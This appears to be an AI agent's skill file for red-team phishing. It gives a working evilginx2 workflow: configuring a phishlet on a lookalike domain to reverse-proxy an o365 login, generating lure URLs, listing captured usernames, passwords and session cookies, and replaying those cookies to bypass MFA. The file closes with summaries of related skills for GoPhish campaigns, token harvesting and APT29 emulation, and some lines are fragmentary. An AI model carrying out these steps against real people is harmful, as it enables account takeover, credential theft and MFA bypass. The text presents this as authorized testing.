evilginx2-proxy
Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft.
| name | evilginx2-proxy |
| description | Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft. |
| metadata | {"subdomain":"phishing","when_to_use":"evilginx2, mfa bypass, session cookie capture, reverse proxy phishing, phishlet, adversary in the middle, aitm","mitre_attack":["T1566.002","T1557","T1539","T1111"],"tags":["phishing","evilginx","mfa-bypass","aitm"]} |
When the target enforces MFA, a static fake login page is useless — you need the authenticated session cookie. evilginx2 is an adversary-in-the-middle reverse proxy: the victim authenticates against the real site through your proxy, MFA included, and you capture the resulting session token for replay.
lookalike-domain).
lure-deconfliction handshake COMPLETE.

```shell
# DNS + cert: evilginx manages Let's Encrypt automatically
evilginx2 -p /opt/evilginx/phishlets
# in the evilginx console:
config domain login.acme-portal.example
config ipv4 <sandbox-ip>
phishlets hostname o365 login.acme-portal.example
phishlets enable o365
lures create o365
lures get-url 0   # -> the link you put in the GoPhish email
```
A phishlet is a YAML map of the target's auth hosts, the sub_filters that rewrite the real domain to yours in responses, and the auth_tokens (which cookies signal a completed login). Capture a normal login in a proxy, identify the session cookie(s) the app sets post-MFA, and list them under auth_tokens. Keep ACME challenge paths off the proxied auth path.
```shell
# evilginx console: list captured sessions
sessions
sessions <id>   # shows username, password, and the tokens (cookie JSON)
```
Import the captured cookie JSON into a clean browser profile / a Cookie header to ride the authenticated session without re-triggering MFA.
Captured session → Credential node (type session-token) linked to the User node with the lure id. Save the session JSON under evidence/phisher/<id>-session.json. Note the estimated token TTL.
evidence/ + the knowledge graph, never anywhere off-box.

evilginx_disable_phishlet (phishlets disable o365) returns 502 on a SOC stop request.

Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling.
Register and provision a lookalike / Punycode phishing domain with DNS and TLS so GoPhish and evilginx2 lures resolve and pass modern mail + browser checks.
Harvest and replay O365 / Entra ID access via the OAuth device-code flow and captured tokens (TokenTactics-style), skipping the password + MFA prompts.
Design a credible phishing pretext and target shortlist from OSINT before any campaign is built — sender persona, scenario, timing, and the minimal target set.
Phishing / social-engineering catalog for the Phisher agent. Use ONLY when the engagement RoE authorizes a phishing engagement. Covers pretext design, GoPhish campaigns, evilginx2 MFA-bypass proxying, O365 credential/token harvest, lookalike domains, and the mandatory blue-team deconfliction handshake.
APT29 (Cozy Bear / Midnight Blizzard, SVR) adversary-emulation playbook — malware-light cloud-identity espionage: no-MFA password spray, OAuth consent/token abuse, Golden SAML, mailbox collection over residential proxies. Use when emulating APT29 against an M365/Entra/AWS-identity estate. Triggers on: 'emulate APT29', 'Cozy Bear', 'Midnight Blizzard', 'NOBELIUM', 'OAuth abuse', 'cloud identity espionage', 'Golden SAML'.